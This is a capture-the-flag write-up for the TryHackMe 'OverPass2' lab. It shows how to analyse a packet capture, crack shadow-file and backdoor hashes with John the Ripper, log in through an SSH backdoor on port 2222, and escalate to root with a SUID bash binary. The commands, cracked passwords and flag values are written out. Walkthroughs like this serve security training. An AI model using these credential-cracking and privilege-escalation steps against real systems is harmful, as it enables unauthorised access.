OverPass2

Target Details

  • IP: 10.10.145.49

Analyze pcap file

  • Download pcap file

  • Open it with Wireshark

    sudo wireshark
  • Follow TCP streams, you'll find all the answers to the questions

Crack Hashes from the WireShark packets

  • Download fasttrack wordlist

  • While analyzing the packets, copy the user entries from the dumped shadow file into shadow_dump.txt

  • Crack the shadow file passwords using John

    john -w=/usr/share/wordlists/fasttrack.txt shadow_dump.txt

    The user hashes are stored in shadow_dump.txt.

    Username    Password
    bee         secret12
    szymex      abcd123
    muirland    1qaz2wsx
    paradox     secuirty3

  • Get the hash from the packet capture and the hard-coded salt from the ssh-backdoor GitHub repo

  • Store them in hash.txt file in hash:salt format

  • Crack using John

    john -w=/usr/share/wordlists/rockyou.txt hash.txt

    Username    Password
    james       november16

Hack Again

  • Log in through the backdoor SSH service, since we already know the password

    ssh -p 2222 james@10.10.145.49
  • Get User Flag

    cat /home/james/user.txt
    # thm{d119b4fa8c497ddb0525f7ad200e6567}
  • Listing hidden files reveals .suid_bash, which can be run as root

    /home/james/.suid_bash -p
    .suid_bash-4.4#
  • We've rooted the machine

    .suid_bash-4.4# whoami
    root
  • Get root flag

    .suid_bash-4.4# cat /root/root.txt
    thm{d53b2684f169360bb9606c333873144d}
